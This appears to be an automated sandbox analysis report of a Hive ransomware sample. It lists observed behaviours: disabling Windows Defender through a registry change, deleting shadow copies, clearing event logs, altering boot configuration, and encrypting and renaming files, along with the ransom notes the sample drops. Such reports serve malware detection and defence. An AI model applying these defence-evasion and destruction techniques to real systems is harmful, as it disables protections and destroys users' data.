Analysis Overview
SHA256
6c0e759936d63c0dfc6f9ab077817b6de3b251b44e0bde1d966aea3a73ac2c2e
Threat Level: Known bad
The file 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.7z was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Deletes shadow copies
Clears Windows event logs
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Interacts with shadow copies
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-20 00:34
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-20 00:34
Reported
2022-03-20 01:05
Platform
win7-20220311-en
Max time kernel
4294371s
Max time network
325s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\RevokeFind.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointOpen.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointResume.crw => C:\Users\Admin\Pictures\CheckpointResume.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CopyUndo.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ReadWatch.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeFind.crw => C:\Users\Admin\Pictures\RevokeFind.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DisableSplit.crw => C:\Users\Admin\Pictures\DisableSplit.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DisableSplit.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UndoNew.tif => C:\Users\Admin\Pictures\UndoNew.tif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointOpen.png => C:\Users\Admin\Pictures\CheckpointOpen.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompareImport.raw => C:\Users\Admin\Pictures\CompareImport.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareImport.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromPing.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromSet.raw => C:\Users\Admin\Pictures\ConvertFromSet.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromPing.crw => C:\Users\Admin\Pictures\ConvertFromPing.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CopyUndo.crw => C:\Users\Admin\Pictures\CopyUndo.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SearchMove.png => C:\Users\Admin\Pictures\SearchMove.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SearchMove.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UndoNew.tif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointResume.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromSet.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinAdd.raw => C:\Users\Admin\Pictures\JoinAdd.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\JoinAdd.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ReadWatch.raw => C:\Users\Admin\Pictures\ReadWatch.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Spades\es-ES\ShvlRes.dll.mui.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\RSSFeeds.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\offset.ax | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18207_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SPANISH.LNG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File created | C:\Program Files\Microsoft Games\Chess\fr-FR\xG7b_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0234687.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_on.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01065_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\settings.css | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00523_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\localizedStrings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Clarity.eftx.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\setup_wm.exe.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\settings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\THMBNAIL.PNG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\LoanAmortization.xltx.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\settings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\xG7b_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\xG7b_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\drag.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\es-ES\Sidebar.exe.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
